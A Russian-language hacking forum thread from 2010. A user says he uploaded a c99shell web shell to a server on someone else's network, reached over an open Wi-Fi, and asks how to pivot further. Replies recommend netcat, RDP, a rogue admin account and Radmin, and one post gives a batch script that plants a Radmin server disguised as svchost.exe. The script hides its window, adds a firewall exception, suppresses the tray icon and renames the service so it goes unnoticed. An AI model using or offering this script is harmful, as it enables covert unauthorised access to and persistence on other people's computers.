ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Безопасность > Windows
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Не знаю какой шелл залить на windows машину
  #1  
Старый 18.02.2010, 16:19
infery
Новичок
Регистрация: 14.02.2010
Сообщений: 3
Провел на форуме:
13667

Репутация: 0
Question Не знаю какой шелл залить на windows машину

всем привет. проблема вот в чем. Недавно обнаружился у друзей вайфай с халявным инетом.нашел первый попавшийся комп с сервером, чуть поднапрягся и залил туда c99shell, сейчас все работает. как оказалось, это был один из основных компов довольно крупной сети. на данный момент мой внутренний ип вайфай сети 11.0.0.105. мне нужен комп из внешней сети с ипом 192.168.11.53. что в планах: использовать метасплоит, но проблема в том что я не смогу законектиться с нужным компом, так как нахожесь во внутренней сети. хочу залить на поломанный серв метасплоит и уже с него ломать. но опять же мне нужна оболочка для управления поломанным компом, чтоб можно было залить исполняемый файл через с99 и тупо запустить, законнектиться и юзать метасплоит для дальнейших действий. так вот в чем вопрос: подскажите какую нибудь оболочку, чтоб можно было просто залить, запустить и законектиться, разумеется без установки. спасибо
 
Ответить с цитированием

  #2  
Старый 18.02.2010, 16:40
infery
Новичок
Регистрация: 14.02.2010
Сообщений: 3
Провел на форуме:
13667

Репутация: 0
По умолчанию

тут подумал... msfweb может разрешить доступ извне? например сейчас залью и просто зайду на серв и с него уже буду работать дальше


------------
не, консоль привычней
 
Ответить с цитированием

  #3  
Старый 18.02.2010, 18:21
(Dm)
Reservists Of Antichat - Level 6
Регистрация: 08.04.2008
Сообщений: 286
Провел на форуме:
2375131

Репутация: 1695
По умолчанию

ты хоть сам понял чего понаписал?
предложу варианты:
rdp, radmin (radmin есть на форуме не палящийся в трее)
Если конечно тру хеккер =) netcat тебе в помощь =)

PS "из внешней сети с ипом 192.168.11.53." =)
__________________
Cервер cs 1.6
cs.antichat.net:27015

Последний раз редактировалось (Dm); 18.02.2010 в 18:33..
 
Ответить с цитированием

  #4  
Старый 19.02.2010, 05:55
infery
Новичок
Регистрация: 14.02.2010
Сообщений: 3
Провел на форуме:
13667

Репутация: 0
По умолчанию

ты меня чуток не понял да и я толком объяснить не смог. уже неважно. теперь на серве есть netcat. поискал гуглем как поставить metasploit на винду из консоли, чтоб без всяких окошек. ничего толкового не нашел. есть предложения?
 
Ответить с цитированием

  #5  
Старый 21.02.2010, 11:03
$ereg@
Познающий
Регистрация: 21.08.2008
Сообщений: 85
Провел на форуме:
298650

Репутация: 15
Отправить сообщение для $ereg@ с помощью ICQ
По умолчанию

настрой на сломанной машине второго юзера-админа, запусти удалённый рабочий стол и сиди как у себя дома, в чём проблема ?
 
Ответить с цитированием

  #6  
Старый 22.02.2010, 14:11
BLaZeViL
Познающий
Регистрация: 19.03.2008
Сообщений: 66
Провел на форуме:
381320

Репутация: 13
Отправить сообщение для BLaZeViL с помощью ICQ
По умолчанию

Залей радмин 2.1:
3 файла
admdll.dll
raddrv.dll
svchost.exe - ну это екзешник серва радмина r_server.exe

Запустишь через шелл в консоле батник:

Код:
cmdow @ /HID
copy /y "svchost.exe" "%SYSTEMROOT%/svchost.exe" 
copy /y "raddrv.dll" "%SYSTEMROOT%/raddrv.dll"
copy /y "admdll.dll" "%SYSTEMROOT%/admdll.dll"

netsh firewall add allowedprogram "%Windir%\svchost.exe" "Remote Administrator Server" ENABLE

REG ADD HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters /v DisableTrayIcon /t REG_BINARY /d 00000001 /f
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\r_server /v DisplayName /t REG_SZ /d "Service Host Controller" /f

"%SYSTEMROOT%/svchost.exe" /install /silence
"%SYSTEMROOT%/svchost.exe" /start
Он сначало копирнет длл и сам сервак в /Windows/
Потом дабавит в бредмаузер исключение(если включен)
Уберет иконку радмина
Переименует службу радмина на Service Host Controller
Чтобы не палили
И установит+стартует сам радмин
 
Ответить с цитированием

  #7  
Старый 07.04.2010, 20:33
Billy_Rays
Banned
Регистрация: 06.04.2010
Сообщений: 2
Провел на форуме:
16915

Репутация: 0
По умолчанию

У меня вопрос . Вот залили мы эти 3 файла admdll.dll raddrv.dll svchost.exe и bat-ник , запустили его что бы в трее иконка не выскакивала и прочее выполнилось ..... Разве в реестре появится ключ радминовский, ведь мы не устанавливили Radmin , а просто кинули библиотеки и сервак на удаленный комп ? Если ключ не появится , то где менять значение параметра отображения иконки в трее? Уф, мой первый вопрос )
 
Ответить с цитированием

  #8  
Старый 13.04.2010, 15:09
maxya
Новичок
Регистрация: 15.02.2010
Сообщений: 26
Провел на форуме:
204981

Репутация: 5
Отправить сообщение для maxya с помощью ICQ
По умолчанию

Цитата:
Сообщение от Billy_Rays  
У меня вопрос . Вот залили мы эти 3 файла admdll.dll raddrv.dll svchost.exe и bat-ник , запустили его что бы в трее иконка не выскакивала и прочее выполнилось ..... Разве в реестре появится ключ радминовский, ведь мы не устанавливили Radmin , а просто кинули библиотеки и сервак на удаленный комп ? Если ключ не появится , то где менять значение параметра отображения иконки в трее? Уф, мой первый вопрос )
В батнике вот эти строки
Цитата:
REG ADD HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters /v DisableTrayIcon /t REG_BINARY /d 00000001 /f
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\r_server /v DisplayName /t REG_SZ /d "Service Host Controller" /f
как раз добавляют radmin в реестр
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
История Windows (с картинками) GrinGoO Статьи 19 17.04.2010 13:01
Секреты Windows 7 Campery Статьи 17 19.11.2009 02:33
Faq Что делать, если компьютер не работает zl0ba Болталка 18 10.12.2006 11:27



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ